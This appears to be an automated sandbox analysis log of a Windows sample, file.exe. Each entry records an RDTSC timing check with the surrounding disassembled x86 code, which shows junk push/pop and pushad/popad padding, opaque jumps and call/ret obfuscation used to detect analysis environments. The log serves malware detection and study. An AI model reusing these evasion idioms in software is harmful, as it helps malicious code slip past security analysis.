                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B68C second address: 136B696 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B696 second address: 136B6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC8515781E0h 0x0000000f jmp 00007FC8515781DAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A40F second address: 136A435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FC850CE3D36h 0x0000000c popad 0x0000000d jmp 00007FC850CE3D49h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A435 second address: 136A448 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8515781DEh 0x00000008 jns 00007FC8515781D6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A448 second address: 136A450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AB01 second address: 136AB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AC44 second address: 136AC6C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D4Eh 0x00000008 jmp 00007FC850CE3D48h 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FC850CE3D36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AF30 second address: 136AF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AF38 second address: 136AF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B24C second address: 136B251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B251 second address: 136B260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FC850CE3D36h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136F965 second address: 136F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFD8F second address: 12EFD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376F49 second address: 1376F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781DAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376F57 second address: 1376F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13779F6 second address: 13779FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13779FC second address: 1377A22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC850CE3D3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC850CE3D3Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377B50 second address: 1377B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC8515781D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007FC8515781D6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377B67 second address: 1377B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377B6B second address: 1377B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC8515781DEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377CFA second address: 1377D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377D02 second address: 1377D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC8515781DEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C63 second address: 1376C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C6D second address: 1376C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C73 second address: 1376C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C77 second address: 1376C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C7B second address: 1376C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D1FB second address: 137D201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D201 second address: 137D20B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C069 second address: 137C06F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C06F second address: 137C075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133BFE8 second address: 1323EEB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC8515781E7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FC8515781D8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ch, D7h 0x00000027 call dword ptr [ebp+122D1FEFh] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 jmp 00007FC8515781E3h 0x00000037 jmp 00007FC8515781DEh 0x0000003c je 00007FC8515781D6h 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C0CA second address: 133C0DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jns 00007FC850CE3D36h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C0DC second address: 133C0E6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8515781DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C63D second address: 133C645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C73D second address: 133C74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FC8515781DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C985 second address: 133C989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D220 second address: 133D24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E9h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC8515781DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D24A second address: 133D24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D24E second address: 133D254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D254 second address: 133D258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D258 second address: 133D26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D26A second address: 133D274 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D274 second address: 133D279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D279 second address: 133D29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FC850CE3D3Eh 0x0000000f push edi 0x00000010 jnp 00007FC850CE3D36h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FC850CE3D36h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D29E second address: 133D2A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D339 second address: 133D33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D33E second address: 133D35D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC8515781E0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC8515781D8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D35D second address: 133D3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC850CE3D3Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and cx, D965h 0x00000011 lea eax, dword ptr [ebp+12481D00h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FC850CE3D38h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jp 00007FC850CE3D36h 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D3AF second address: 133D3B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8515781DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C65F second address: 137C669 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C669 second address: 137C685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C685 second address: 137C689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C689 second address: 137C694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C97B second address: 137C984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C984 second address: 137C994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781DBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CB21 second address: 137CB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CC74 second address: 137CC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC8515781D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384D12 second address: 1384D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384D16 second address: 1384D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383DD2 second address: 1383DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383DD6 second address: 1383E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8515781DAh 0x00000013 jmp 00007FC8515781E5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13840FB second address: 138410B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC850CE3D3Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383863 second address: 1383867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383867 second address: 138388D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC850CE3D48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC850CE3D38h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138388D second address: 1383892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383892 second address: 1383898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386DA1 second address: 1386DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC8515781D6h 0x0000000a jp 00007FC8515781D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386DB1 second address: 1386DCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FC850CE3D44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F2C second address: 1386F55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007FC8515781D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8515781E9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F55 second address: 1386F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F59 second address: 1386F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F72 second address: 1386F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F7D second address: 1386F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBBE0 second address: 12FBBF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389D98 second address: 1389DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DEh 0x00000007 jmp 00007FC8515781DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC8515781DDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A093 second address: 138A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E1A7 second address: 138E1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC8515781D6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E1B5 second address: 138E1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E1C0 second address: 138E1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DB4C second address: 138DB6F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC850CE3D41h 0x00000010 jp 00007FC850CE3D36h 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DEA2 second address: 138DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC8515781E9h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13923AA second address: 13923C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 js 00007FC850CE3D36h 0x0000000c jp 00007FC850CE3D36h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13915F4 second address: 13915F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13915F8 second address: 13915FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13915FE second address: 139160E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC8515781D6h 0x0000000a jg 00007FC8515781D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139160E second address: 1391612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139178B second address: 139178F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139178F second address: 139179D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC850CE3D38h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139179D second address: 13917B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC8515781D6h 0x0000000a jmp 00007FC8515781DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391BF9 second address: 1391BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391D2C second address: 1391D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391D31 second address: 1391D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391ECB second address: 1391EDF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8515781D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391EDF second address: 1391EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391EE7 second address: 1391EEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1397692 second address: 1397696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1397AF2 second address: 1397AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC8515781D6h 0x0000000a rdtsc
